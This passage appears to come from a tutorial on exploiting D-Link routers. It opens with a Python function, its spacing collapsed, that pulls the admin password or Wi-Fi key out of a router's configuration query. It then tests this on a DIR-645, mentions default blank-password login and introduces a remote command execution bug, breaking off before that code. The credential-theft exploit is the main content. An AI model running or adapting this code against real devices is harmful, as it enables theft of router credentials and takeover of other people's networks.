defattempt_password_find(): # Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password data = query_getcfg("DEVICE.ACCOUNT") ifnot data: returnFalse res = re.findall("<password>(.*?)</password>", data) if len(res) > 0and res != "=OoXxGgYy=": return res # Did not find it in first attempt data = query_getcfg("WIFI") ifnot data: returnFalse res = re.findall("<key>(.*?)</key>", data) if len(res) > 0: return res # All attempts failed, just going to return and wish best of luck! returnFalse
And I’ve got a router here which is D-Link DIR 645 and let’s try this vulnerability.
And we can also get the password with this command line.
To be honest, we can login with the username “user” with no password on the type of router. So that’s it. Let’s went to the new vulnerability now. The second bug is that we can execute remote command using “POST” method and in the data part, we need to manipulate our command there. Let’s see the code of this part.
At the first, you need to create a session with the password you get just now.